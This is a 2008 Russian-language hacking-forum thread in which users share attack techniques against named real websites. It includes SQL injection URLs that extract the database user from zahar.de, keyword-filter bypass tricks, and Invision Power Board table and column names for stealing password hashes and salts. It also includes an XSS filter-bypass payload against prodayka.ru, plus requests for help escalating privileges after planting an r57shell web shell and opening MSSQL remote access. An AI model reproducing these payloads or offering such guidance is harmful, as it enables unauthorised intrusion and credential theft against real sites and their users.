 |
|
17.11.2008, 17:12
|
|
Познающий
Регистрация: 15.09.2005
Сообщений: 60
С нами:
10869277
Репутация:
52
|
|
Да как бы проблем особо нету=) КРоме того что долго это все...
1) http://www.zahar.de/bigmir/forum/showprofil.php?id=999+union+select+ascii(substring (user(),1,1))+limit+1,1 - первый символ 85
2) http://www.zahar.de/bigmir/forum/showprofil.php?id=999+union+select+ascii(substring (user(),2,1))+limit+1,1 - второй символ 55
И т.д. погнали
|
|
|
18.11.2008, 00:36
|
|
Новичок
Регистрация: 14.11.2008
Сообщений: 12
С нами:
9204703
Репутация:
10
|
|
у меня проблема если идет фильтрация select и char как можна ещё заменить ? да ещё пробывал ?id=-75 AND 1=1/* And тоже фильтруется
|
|
|
|
18.11.2008, 00:46
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Sindicat
у меня проблема если идет фильтрация select и char как можна ещё заменить ? да ещё пробывал ?id=-75 AND 1=1/* And тоже фильтруется
Видишь ли в чём дело, надо быть очень криворуким кодером, чтобы поставить фильтрацию на AND, char и select, и при этом оставить скуль в параметре id 
100% ты что-то делаешь неправильно. линк кинь посмотрим
|
|
|
|
18.11.2008, 01:26
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами:
10254549
Репутация:
227
|
|
на самом деле бывает и такое
|
|
|
|
18.11.2008, 01:56
|
|
Новичок
Регистрация: 07.11.2008
Сообщений: 17
С нами:
9215627
Репутация:
55
|
|
Сообщение от Sindicat
у меня проблема если идет фильтрация select и char как можна ещё заменить ? да ещё пробывал ?id=-75 AND 1=1/* And тоже фильтруется
Попробуй заменит and на &&, а select на seLEct или sel/*lala*/ect
|
|
|
|
18.11.2008, 02:00
|
|
Новичок
Регистрация: 07.11.2008
Сообщений: 17
С нами:
9215627
Репутация:
55
|
|
Сообщение от Ershik
Еще вопрс, что означает эта уязвимость? Как ей можно воспользоваться?
http://www.campustore.it/ita/viewpage.aspx?ID=431'
Это MsAccess.
Код:
http://forum.antichat.ru/thread50550-msaccess.html
|
|
|
|
18.11.2008, 02:05
|
|
Новичок
Регистрация: 07.11.2008
Сообщений: 17
С нами:
9215627
Репутация:
55
|
|
Сообщение от Pozer
Есть сплоит Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
Так вот, он ворует хеш, но на сколько мне известно в Invision Power Board 2.x.x алгоритм такой:
Значит нужна соль, сплоит её не ворует, где же её взять?
Помоему так:
таблица: ibf_members_converge
колонки: converge_pass_hash,converge_pass_salt
|
|
|
|
18.11.2008, 12:50
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
С нами:
9351767
Репутация:
2
|
|
Вопрос:
Имею доступ к MSSQL серверу с правами dbo, через баг в asp скрипте. Можно ли открыть порт 1433 для удаленного коннекта (к примеру через sp_configure)? Firewall отсутствует. Если можно, то каким образом.
Спасибо
Последний раз редактировалось SHS; 18.11.2008 в 12:53..
|
|
|
|
18.11.2008, 13:38
|
|
Познающий
Регистрация: 09.11.2008
Сообщений: 34
С нами:
9212732
Репутация:
2
|
|
Люди помогите плиз, я новичек в этом деле, поэтому всех фишек не знаю. У меня проблема - залил r57shell на серв - там сэйф моде отключен система freebsd 6.2. Можно ли как нибудь повысить привелегии, или вообще получить пароли к остальным сайтам на этом серве - это моя основная цель. Заранее спасибо
|
|
|
|
18.11.2008, 17:54
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами:
9875796
Репутация:
770
|
|
http://www.prodayka.ru/search.php?do_search=Search&searchword=%22%>+javas c<script<>ript:alert(a)
фильтрация стоит, но в принципе обходимая. вписать можно что угодно, просто показал пример обхода фильтрации.
можно как либо использовать подобное?
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
